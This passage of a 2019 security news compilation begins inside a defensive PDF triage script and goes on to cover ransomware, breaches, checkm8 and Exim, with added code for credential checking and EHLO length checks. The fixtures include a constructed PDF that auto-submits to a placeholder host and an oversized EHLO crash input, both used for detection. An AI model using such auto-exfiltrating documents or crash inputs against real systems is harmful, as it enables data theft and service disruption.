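    return ENCRYPT_RE.search(pdf) is not None


def find_actions(pdf: bytes) -> List[Tuple[int, str]]:
    """(object number, action subtype) for every exfiltration-capable action object."""
    found = []
    for m in OBJECT_RE.finditer(pdf):
        objnum, body = int(m.group(1)), m.group(2)
        for a in ACTION_RE.finditer(body):
            found.append((objnum, a.group(1).decode("ascii")))
    return found


def find_triggers(pdf: bytes) -> List[int]:
    """Object numbers carrying /OpenAction or /AA, i.e. actions that run automatically."""
    return [int(m.group(1)) for m in OBJECT_RE.finditer(pdf) if TRIGGER_RE.search(m.group(2))]


def triage(pdf: bytes) -> Dict[str, object]:
    """Flag a file when it is encrypted yet still carries plaintext actions.

    Limitation: this is a plain-text scan. Objects packed into compressed
    object streams are not inspected, so a clean result is not a proof of safety.
    """
    encrypted = is_encrypted(pdf)
    actions = find_actions(pdf)
    return {
        "encrypted": encrypted,
        "actions": actions,
        "auto_triggers": find_triggers(pdf),
        "suspicious": encrypted and bool(actions),
    }


# Constructed sample: an "encrypted" PDF with an unencrypted SubmitForm action
# that fires on open. The URL is a placeholder, not a real host.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R >>
endobj
4 0 obj
<< /Type /Action /S /SubmitForm /F (http://collector.example/submit) /Flags 4 >>
endobj
6 0 obj
<< /Filter /Standard /V 4 /R 4 /Length 128 >>
endobj
trailer
<< /Root 1 0 R /Encrypt 6 0 R >>
%%EOF
"""

# Constructed sample: encrypted, but with no actions at all.
CLEAN_PDF = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
3 0 obj
<< /Filter /Standard /V 4 /R 4 /Length 128 >>
endobj
trailer
<< /Root 1 0 R /Encrypt 3 0 R >>
%%EOF
"""

if __name__ == "__main__":
    print(triage(SAMPLE_PDF))
    print(triage(CLEAN_PDF))
```

A hit from this check is a reason to quarantine the file for manual review rather than a verdict on its own, and it does nothing about the underlying problem the researchers point to: the format has no integrity check, so the only lasting fix is in the viewers and the standard.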


Google’s Password Manager now checks for breached credentials

By Danny Bradbury

Google has taken the next step in its strategy to secure users’ passwords. The search giant has taken a password-checking feature released early this year as an extension to its Chrome browser and embedded it directly into its password manager service.

In February, the search and advertising giant released Password Checkup, a Chrome extension that checks passwords to see if they are secure. When users enter a username and password, the extension checks a hashed version of the credentials against Google’s internal database of four billion unsafe logins. If the extension finds a match, it will warn the user and suggest that they reset their password.
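The mechanism described above, hashing the username and password pair and comparing it against a corpus of leaked logins, can be modelled in a few lines. The code below is an added example for this page, not Google's code and not a description of the Password Checkup protocol, whose details the article does not give. It assumes a simple prefix-bucket scheme: the client sends only the first few hex characters of a SHA-256 hash, the server returns every suffix in that bucket, and the match is made on the client so the server never learns the full credential. The breach corpus is three constructed pairs.

```python
import hashlib
from typing import Dict, Iterable, Set, Tuple

# Constructed sample breach corpus (username, password). A real service holds
# billions of these; only the size differs, not the mechanism.
BREACHED_PAIRS = [
    ("alice@example.com", "Password123"),
    ("bob@example.com", "hunter2"),
    ("carol@example.com", "letmein!"),
]

# 24-bit bucket: this prefix is the only part of the hash that leaves the client.
PREFIX_HEX_CHARS = 6


def normalize_username(username: str) -> str:
    """Case and whitespace in the username must not hide a match."""
    return username.strip().lower()


def credential_hash(username: str, password: str) -> str:
    """Hash the pair as one unit, so a password leaked for some other account
    does not produce a false alarm here (that is a different, weaker check)."""
    material = f"{normalize_username(username)}:{password}".encode("utf-8")
    return hashlib.sha256(material).hexdigest()


def build_index(pairs: Iterable[Tuple[str, str]]) -> Dict[str, Set[str]]:
    """Server side: hash prefix -> set of hash suffixes."""
    index: Dict[str, Set[str]] = {}
    for user, pw in pairs:
        h = credential_hash(user, pw)
        index.setdefault(h[:PREFIX_HEX_CHARS], set()).add(h[PREFIX_HEX_CHARS:])
    return index


def bucket_for(index: Dict[str, Set[str]], prefix: str) -> Set[str]:
    """Server side: answer a prefix query with the whole bucket, never a yes/no."""
    return index.get(prefix, set())


def is_compromised(index: Dict[str, Set[str]], username: str, password: str) -> bool:
    """Client side: compute the hash locally, fetch the bucket, match locally."""
    h = credential_hash(username, password)
    prefix, suffix = h[:PREFIX_HEX_CHARS], h[PREFIX_HEX_CHARS:]
    return suffix in bucket_for(index, prefix)


if __name__ == "__main__":
    idx = build_index(BREACHED_PAIRS)
    for user, pw in [("alice@example.com", "Password123"),
                     ("alice@example.com", "correct horse battery staple")]:
        verdict = "reset it" if is_compromised(idx, user, pw) else "no known leak"
        print(f"{user}: {verdict}")
```

The design point worth noticing is where the comparison happens: the server sees a prefix shared by many unrelated hashes and returns a bucket, so it cannot tell which, if any, of those entries the client was asking about. Making the prefix shorter widens that anonymity set at the cost of a bigger download per query.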

Now, the company has decided to integrate this feature directly into its password manager, which is the feature in Chrome that asks if you want to save the login credentials for online services and reuse them later.


Ransomware attacks paralyze, and sometimes crush, hospitals

By Lisa Vaas

Major hospitals and some health clinics in the US and Australia have been crippled in new ransomware attacks, forcing some into emergency manual mode and one to close permanently due to extensive loss of patient healthcare records encrypted by data kidnappers.

In Australia, the toll is seven hospitals. According to an advisory issued on Tuesday by Victoria’s Department of Premier and Cabinet, a ransomware attack discovered on Monday has blocked access to several key systems, including financial management.

The hospitals and health services, which are located in Gippsland and south-west Victoria, have isolated a number of systems, taking them offline so as to quarantine the infection.

Isolating the systems has led to the shutdown of some patient record, booking and management systems, which may affect patient contact and scheduling. Where practical, some of the hospitals are reverting to manual systems to maintain patient services.

Loss of access to patient histories, charts, images and other information has forced the hospitals to rework bookings and scheduling so as to minimize disruption of service.

Meanwhile, in the US, three medical centers in western Alabama said this week that they’re not taking new patients due to a ransomware attack. According to a press release put out on Tuesday, elective procedures and surgeries scheduled for the next day – Wednesday, 2 October – would be going ahead as planned, with the centers running on “downtime” procedures that they say enable them to provide “safe and effective care” for those patients.

Current patients are staying put: they’re not being transferred to other medical centers. New admissions for critical cases are being diverted to other facilities, however. As for tests and other procedures, patients are being advised to call before they show up.


October 2, 2019 »

Ex-Yahoo engineer pleads guilty to hacking 6,000 accounts

By Lisa Vaas

A former Yahoo software engineer pleaded guilty in federal court on Monday to being a lech who broke into mostly young women’s Yahoo accounts – 6,000 of them – trying to sniff out salacious photos and videos.

According to the US Attorney’s Office for the Northern District of California, in his guilty plea, Reyes Daniel Ruiz admitted to cracking Yahoo users’ passwords and using his access to internal Yahoo systems to get at accounts, including those of his personal friends and work colleagues.

After he got into his victims’ Yahoo accounts, he’d make copies of their intimate content and stash them at home. He’d also pivot from their Yahoo accounts, branching out to break into and grope through his victims’ iCloud, Facebook, Gmail, Dropbox, and other online accounts for whatever other salacious content he could find.

Yahoo saw what it thought was suspicious behavior. The Department of Justice’s press release didn’t give details of how Ruiz got wind of his former boss’s suspicions – was he confronted? Did a mass email go out, telling employees to keep their paws to themselves? – but prosecutors did say that Ruiz admitted that after Yahoo got wind of his unsavory forays, he demolished the computer and hard drive that he was using to store the ripped-off imagery.

Ruiz, 34, of Tracy, California, was indicted by a federal grand jury on 4 April 2019. He was charged with one count of computer intrusion and one count of interception of a wire communication, but under the plea agreement, he just pled guilty to the computer intrusion charge.

Ruiz is now out on a $200K bond. He’s looking at a maximum sentence of five years in prison and a fine of $250,000 plus restitution, though maximum sentences are rarely handed out. He’s scheduled to be sentenced on 3 February 2020.

Just for comparison’s sake, we can look to how much prison time the celebrity e-muggers have received as payback for prying open the iCloud and Gmail accounts of Hollywood glitterati in the Celebgate mini-series – when primary scumbags preyed on celebrities and non-celebrities alike to steal their nudes, and secondary scumbags had a field day sharing the material online.


218 million Words with Friends players lose data to hackers

By Lisa Vaas

On 12 September, Zynga released a low-key statement saying that it had been beset by an “unfortunate reality” of doing business today: PR-speak for a data breach.

Zynga – maker of addictive (and crook-tempting) online social games such as FarmVille, Mafia Wars, Café World and Zynga Poker – said at the time that it had immediately launched an investigation. The early good news: it didn’t look like any financial information had been ripped off from players of the targeted games, Words With Friends and Draw Something.

Well, that unfortunate reality has now become a lot more unfortunate: it’s 218 million account passwords worth of misfortune to the Words With Friends players whose accounts were allegedly breached.

On Sunday, Hacker News reported that it’s been in touch with the threat actor known as GnosticPlayers, who claims to be responsible for the Zynga breach.

Another GnosticPlayers feeding frenzy

He/she/they have been in the headlines for gargantuan breaches this year: in March 2019, the hacker(s) put up 26 million records for sale, stolen from six online companies. As we reported then, the first of what would turn out to be four data caches had gone up for sale in early February, when GnosticPlayers tried to sell a database of 617 million records pilfered from 16 companies for $20,000.

Days later, GnosticPlayers added 127 million records stolen from eight websites, before adding a third round on 17 February comprising another 93 million from another eight sites.


O.MG! Evil Lightning cable about to hit mass distribution

By Danny Bradbury

Remember the O.MG cable? Back in February, we covered its early development: A project by self-taught electronics hacker _MG_, it’s a malicious Lightning cable that looks just like the regular overpriced piece of wire that connects your iPhone to a computer.

Embedded in it is a tiny Wi-Fi transceiver that can operate as an access point or a wireless client. When the victim plugs it into their computer, an attacker within radio distance can connect to the cable with a mobile app and use it to manipulate the computer.

An attacker can reach the O.MG cable from 300 feet away using Wi-Fi from a regular phone, but a suitable booster antenna connected to your computer or phone could enable a connection from even further away.

@_MG_ has been steadily working on it along with a team of fellow hackers, and says that he spent over $4,000 on what is effectively a “negative profit project”. He spent months hand-milling the tiny integrated circuit boards and then painstakingly putting them inside the ends of Apple Lightning cables. He gave these prototypes away at DEF CON in August 2019. Now, having perfected the performance of the cable and created a design suitable for manufacturing, he is preparing to sell them through penetration testing hardware site, Hak5.

The project has come a long way, with some extensive work on the kinds of payload it can deliver.


Exim suffers another ‘critical’ remote code execution flaw

By John E Dunn

Remember the critical remote code execution (RCE) vulnerability in the Exim email server, CVE-2019-15846, from mid-September?

Barely two weeks later, and the software’s maintainers have issued an advisory for another potentially troublesome bug, identified as CVE-2019-16928, which has been given the same critical rating.

Affecting all Exim versions between and including 4.92 to 4.92.2, this one’s described as:

A heap-based buffer overflow in string_vformat (string.c). The currently known exploit uses an extraordinarily long EHLO string to crash the Exim process that is receiving the message.

The “currently known exploit” refers to a proof of concept created by QAX A-Team, which first reported the flaw.

This could lead to at least a denial of service crash in the software but also, more worryingly, the possibility of remote code execution.

The flaw isn’t being targeted in the wild yet, but there is a risk this might be a matter of time given that it looks relatively easy to exploit.
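Until the patched release is in place, the one observable the advisory gives defenders is the oversized EHLO itself. The following check is an added example for this page, not code from Exim or from QAX A-Team, and it does not reproduce the bug: it simply measures EHLO command lines against the limits RFC 5321 already sets (255 octets for a domain, 512 octets for a command line including CRLF), which no legitimate client should exceed. The session it runs over is constructed for the example, not a real capture.

```python
from typing import List, Tuple

# Limits from RFC 5321 section 4.5.3.1.
MAX_DOMAIN_OCTETS = 255          # maximum length of a domain name
MAX_COMMAND_LINE_OCTETS = 512    # maximum command line, including trailing CRLF


def check_ehlo(line: bytes) -> Tuple[bool, str]:
    """Judge one SMTP command line as received on the wire.

    Returns (ok, reason). Non-EHLO lines always pass; this check is only
    about the EHLO argument the advisory mentions.
    """
    if not line.upper().startswith(b"EHLO"):
        return True, "not an EHLO"
    if len(line) > MAX_COMMAND_LINE_OCTETS:
        return False, f"command line is {len(line)} octets (limit {MAX_COMMAND_LINE_OCTETS})"
    argument = line[4:].strip()
    if len(argument) > MAX_DOMAIN_OCTETS:
        return False, f"EHLO argument is {len(argument)} octets (limit {MAX_DOMAIN_OCTETS})"
    return True, "within RFC 5321 limits"


def scan_session(lines: List[bytes]) -> List[Tuple[int, bytes, str]]:
    """Run check_ehlo over a session transcript.

    Returns (line index, first 32 bytes of the line, reason) for each
    violation, so a finding can be logged without echoing 4 KB of garbage.
    """
    findings = []
    for i, line in enumerate(lines):
        ok, reason = check_ehlo(line)
        if not ok:
            findings.append((i, line[:32], reason))
    return findings


# Constructed SMTP session: three ordinary commands, then an EHLO far beyond any limit.
SAMPLE_SESSION = [
    b"EHLO mail.example.org\r\n",
    b"MAIL FROM:<sender@example.org>\r\n",
    b"RSET\r\n",
    b"EHLO " + b"A" * 4000 + b"\r\n",
]

if __name__ == "__main__":
    for index, head, reason in scan_session(SAMPLE_SESSION):
        print(f"line {index}: {reason} ({head!r}...)")
```

A rule like this belongs in front of the mail server (a proxy, an IDS signature, or a firewall rule that drops over-long command lines), and it is a stopgap for detection only; the fix for the bug is the maintainers' patched release.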


October 1, 2019 »

Cloudflare adds VPN features to privacy app

By John E Dunn

As promised in April, Cloudflare has finally launched Warp, a consumer mobile privacy app that looks a lot like a VPN without actually being one.

That sounds confusing so let’s start by describing the service itself, which can be accessed via a free Android and iOS app called Warp, and a $4.99 per month subscription app called Warp+.

The first, Warp, is a development of the service and mobile apps launched in 2018 as an alternative DNS resolver that headlined on the theme of privacy – i.e. we don’t log the sites you visit.

More recently, the app added support for the emerging encrypted DNS standards, DNS-over-HTTPS (DoH) and DNS-over-TLS (DoT), which hide the domains people visit from ISPs and anyone else listening in (Mozilla recently integrated this service into Firefox).

Now has become ‘ with Warp’ by adding the ability to encrypt all traffic from the mobile device and not just DNS queries, hence the similarity to a full VPN.

What does the Warp+ subscription add to this? Despite being limited to one device, the user gets unlimited bandwidth and 30% better performance thanks, Cloudflare says, to Warp+ traffic being routed over its global network in an optimized way.

Note that if you signed up for the Warp waiting list via the app, you also get the chance to try Warp+ free of charge with an initial 10GB of data.

If Warp isn’t a VPN, what is it?

Traditional VPNs route a user’s network traffic to a trusted, internet-connected server, via an encrypted ‘tunnel’. The security benefit of a VPN is that it lets a user send traffic via a provider they trust (the VPN company) while hiding it from others they don’t trust (ISPs, Wi-Fi snoopers and bad actors), who can’t see inside the tunnel.


Hacking 2020 voting systems is a ‘piece of cake’

By Lisa Vaas

It’s still child’s play to pick apart election systems that will be used in the 2020 US presidential election, as ethical hackers did, once again, over the course of two and a half days at the Voting Village corner of the DefCon 27 security conference in August.

The results are sobering. This is the third year they’ve been at it, and security is still abysmal.

On Thursday, Voting Village organizers went to Capitol Hill to release their findings, in an event attended by election security funding boosters Sen. Ron Wyden and Rep. Jackie Speier.

In a nutshell: in August, hackers easily compromised every single one of the more than 100 machines to which they were given access, many with what they called “trivial attacks” that required “no sophistication or special knowledge on the part of the attacker.” They didn’t get their hands on every flavor of voting system in use in the country, but every one of the machines they compromised is currently certified for use in at least one voting jurisdiction, including direct-recording electronic (DRE) voting machines, electronic poll books, Ballot Marking Devices (BMDs), optical scanners and hybrid systems.

From the Voting Village press release:

In too many cases physical ports remain unprotected, passwords remain unset or left in default configurations and security features of the underlying commercial hardware are left unused or even disabled.

Same old, same old

During the three years that Voting Village has tested voting system security, there’s been no shortage of warnings about the potential for tampering with any election systems connected to the internet or to any network. The state of election non-security is serious enough that the Defense Advanced Research Projects Agency (DARPA) is working on it: it’s hoping to create an electronic voting system that it hopes will prevent tampering with voting machines at the polls.


China’s 500-megapixel camera is capable of mega-facial-recognition

By Danny Bradbury

Stop bragging about how many megapixels your snazzy new prosumer DSLR camera has – China has beaten you to it. Researchers there have just announced a 500mp camera. Rather than taking stunning vacation photos, though, one of the most likely uses for this wide-angle, beer crate-sized device is for identifying people dozens of meters away using facial recognition.

Fudan University worked with the Changchun Institute of Optics, Fine Mechanics and Physics of the Chinese Academy of Sciences to develop the camera, which takes both pictures and video in unparalleled detail. ABC’s story suggests that this is five times the resolution of the human eye, but scientific imaging specialist Roger Clark says that the human eye has an effective resolution of around 576mp.

Whichever figure you believe, 500 megapixels (or 0.5 billion pixels) is more than enough to pick out faces in a stadium or on a street corner with the camera’s built-in facial recognition techniques.

This should have your privacy alarm bells ringing, but that’s just one part of the story. There’s also the possibility of a link with China’s emerging social credit system (SCS). Designed for a full national rollout in China next year, it assigns points for activities deemed socially acceptable, like donating blood and doing volunteer work, while subtracting them for negative actions like jaywalking or not showing up for restaurant reservations.

Apparently, in some local prototypes, telcos show you a message when calling someone on the social credit system’s blacklist telling you that the person you’re calling is dishonest. We didn’t think that we’d find ourselves living in Black Mirror’s excellent Nosedive episode for a while yet, but oh well, here we are.


Darknet hosting provider in underground NATO bunker busted

By Lisa Vaas

A large piece of the dark web’s spine has been broken: German investigators announced on Friday that they’ve excavated the CyberBunker.

The so-called bulletproof hosting provider, located five floors underground in a heavily fortified, Cold War-era, former NATO bunker in Germany is a data center with around 2,000 servers, dedicated to shielding illegal activity from the eyes of law enforcement.

Thirteen suspects connected to CyberBunker – seven arrested and the rest still at large – are being investigated in connection to the websites hosted by the data center, which involved arms trafficking, trafficking in child abuse imagery and drugs, selling fake documents, marketing stolen data, conducting large-scale cyber-attacks, or, as described by a spokesman for the Rhineland-Palatinate State Office of Criminal Investigation (LKA):

Anything you can imagine on the Darknet.

Prosecutor Jürgen Brauer and regional criminal police chief Johannes Kunz said in a press conference on Friday that the countrywide, nearly five-year, complex investigation is the first time that German police have managed to break the operations of a bulletproof hosting provider.

The accused include 12 men and one woman, aged between 20 and 59. Police have arrested seven men and have issued warrants for the rest of the men and the one woman. Four of the suspects are Dutch, one is Bulgarian and two are German. As well, 18 search warrants have been issued.

Wall Street Market crumbles

So far, investigators have determined that the darknet marketplaces and forums hosted by CyberBunker servers included, for one, the Wall Street Market (WSM): the second-largest marketplace of its kind in the world. An e-commerce site, it was something like an eBay for drugs, police said. They say it handled 250,000 transactions for a total of more than 41 million euros (USD $44.66m, £36.28m).


September 30, 2019 »

Checkm8 jailbreak and AltStore put cracks in Apple’s walled garden

By Danny Bradbury

Jailbreaking iPhones has become a lot harder with each new version of the hardware, but this weekend saw two new announcements that enable people to install apps on their phones. One of them is a traditional jailbreak, while the other is an alternative app store that uses a loophole in Apple’s code-signing process.

Jailbreaking is a form of privilege escalation. Hackers figure out ways to change the operating system kernel, unlocking features that Apple had locked down. One of its most common uses is to install apps that Apple doesn’t allow into its app store because they fall outside the company’s strict developer review policy.

On Twitter last Friday, iOS security researcher @axi0mX released a jailbreak bug that affected devices from Apple’s iPhone X all the way back to the iPhone 4S running Apple’s A5 chip, which the company released in 2011. It doesn’t hit the iPhone 11 family announced this month, powered by the company’s new A13 chip.

The code, released on GitHub for free, relies on a race condition in Apple’s bootrom. This is the first piece of hardware that the iPhone loads code from when it is turned on, and it’s a read-only part of the hardware that Apple can’t patch.

To prove the point, @axi0mX also tweeted a video of an iPhone booting in verbose mode, using the latest iOS 13.1.1 version. They labelled the jailbreak checkm8, and said that it is a “permanent unpatchable bootrom exploit for hundreds of millions of iOS devices.”


Social media manipulation as a political tool is spreading

By Lisa Vaas

Social media manipulation is getting worse: as more governments use it to manipulate public opinion, it’s becoming a rising threat to democracy, according to a new report from the Oxford Internet Institute.

There’s nothing new about political parties and governments using propaganda, but the new normal includes toxic messaging that’s easy to spread on a global scale with the brawny new tools for targeting and amplification, they said.

According to the University of Oxford’s Computational Propaganda Research Project, the use of algorithms, automation, and big data to shape public opinion – i.e. computational propaganda – is becoming “a pervasive and ubiquitous part of everyday life.”

For its third annual report, the project examined what it calls “cyber troop” activity in 70 countries. Cyber troops is the collective term for government or political party actors that use social media to manipulate public opinion, harass dissidents, attack political opponents or spread polarizing messages meant to divide societies, among other things.

Over the past two years, there’s been a 150% increase in the number of countries using social media to launch manipulation campaigns, the project found.

The use of computational propaganda to shape public attitudes via social media has become mainstream, extending far beyond the actions of a few bad actors. In an information environment characterized by high volumes of information and limited levels of user attention and trust, the tools and techniques of computational propaganda are becoming a common – and arguably essential – part of digital campaigning and public diplomacy.

What accounts for the growth?

Part of the growth can be attributed to observers getting more sophisticated when it comes to identifying and reporting such manipulation campaigns, given digital tools and a more precise vocabulary to describe the cyber troop activity they uncover, the researchers said.


Is the era of social media Likes over?

By Lisa Vaas

Cast your mind back to 2014, and you might recall Mark Zuckerberg mulling the public’s desire to have a “dislike” button on Facebook.

During a public Q&A, the CEO presented button semantics as being something like a Marvel comics battle between good and evil, with the Like button presumably being, to his mind, a “force for good”:

There’s something that’s just so simple about the ‘like’ button … but giving people more ways of expressing more emotions would be powerful. We need to figure out the right way to do it so it ends up being a force for good, not a force for bad and demeaning the posts that people are putting out there.

But now, as a mounting body of research points to the number of content Likes – or lack thereof – negatively influencing some users’ self-esteem, it may be time to question whether the Like button might have turned out to be a force for bad.

Recent studies have linked increased depression, poor sleeping habits, and unhealthy body image in children and teens with higher use of social media and digital devices.

To address the mess they’ve made, at this point, Instagram – which a 2017 study found to be the worst social media app for young people’s mental health – and Facebook are taking a serious look at the possibility of doing away with Likes.

In April 2019, Instagram announced that it was running a test in Canada: it was hiding Like counts on some users’ photos and videos as an experiment to try to lessen competitiveness on the platform.

The idea: to make us feel less envious, less ashamed, and more focused on self-expression rather than like we’re vying in a personality competition. It’s all about getting people to focus on the content they share, not the likes, a spokesperson said when news about the test was announced at F8, Facebook’s annual developers conference:


‘Fleeceware’ Play store apps quietly charging up to $250

By John E Dunn

Imagine an Android GIF-making app available on Google Play that automatically charges €214.99 ($253) to continue using it beyond its three-day trial period.

Or how about a completely unremarkable QR code reader app, whose developer thinks that a charge of €104.99 is a fair price to continue using it 72 hours after it was downloaded.

If you think these prices sound far-fetched, we have news – researchers at SophosLabs have discovered at least 15 apps which have been downloaded millions of times between them charging these extraordinary prices under Google’s nose.

The most unexpected part of this discovery? By exploiting a loophole in the Play store licensing regime, this behavior appears to be legal.

Getting away with it

The scam works by exploiting the legitimate app behavior of allowing users to download apps under a trial license period which, in this case, ends after a few days.

There is nothing obviously malicious about the apps, which mostly work as advertised, albeit that their features are identical to advertising-supported apps that cost nothing.

Importantly, the apps ask users to submit their payment details during the trial period, which most users probably assume won’t apply if they de-install the app.

Because the huge annual subscription price is only mentioned in small print, users probably assume the cost will be a few dollars or euros.

SophosLabs’ researchers discovered three apps charging €219.99 for full licenses, with another five charging €104.99, and one charging €114.99.

One of these ‘fleeceware’ apps had more than 10 million downloads, two had 5 million, with the rest between 5,000 and 50,000.


Apple users, patch now! The ‘bug that got away’ has been fixed

By Paul Ducklin

Remember the Black Hat conference of 2019?

Chances are you didn’t attend – even though it’s a huge event, the vast majority of cybersecurity professionals only experience it remotely – but you probably heard about some of the more dramatic talk titles…

…including one from Google with the intriguing title Look, no hands! – The remote, interaction-less attack surface of the iPhone.

The talk was presented by well-known Google Project Zero researcher Natalie Silvanovich, and it covered a wide-ranging vulnerability research project conducted by Silvanovich and her colleague Samuel Groß.

They decided to dig into the software components in your iPhone that automatically process data sent to it from outside, to see if they could find bugs that might be remotely exploitable.

Silvanovich and Groß investigated five message-handling components on the iPhone: SMS, MMS, visual voicemail, email and iMessage.

The idea was to search not for security bugs by which you could be tricked into making a serious security blunder, but for holes by which your device itself could be tricked without you even being involved.

They found several such flaws, denoted by the following CVE numbers: CVE-2019-8624, -8641, -8647, -8660, -8661, -8662, and -8663.


Chrome cripples movie studio Mac Pros

By Danny Bradbury

It’s not often that a single software bug can bring an entire industry to a virtual standstill, but it happened this week – and experts finally found an unlikely culprit.

The problem began on Monday 22 September when reports emerged of a problem with Macs running Avid software.

Avid is an editing suite that production companies use to put movies and TV programs together. A few days ago, movie editors started reporting that Mac Pros running Avid software were crashing. If users tried to restart their machines, they wouldn’t reboot.

Here’s one tweet from Shane Ross, staff editor at Prometheus Entertainment, as the situation broke:

Imagine how you’d be feeling if you were working on something with a deadline of hours, like a news segment.

Props to Avid, which was all over this problem from the beginning, dropping everything to work out the issue, in a perfect example of how to handle a technical issue properly. The company even put up a video:

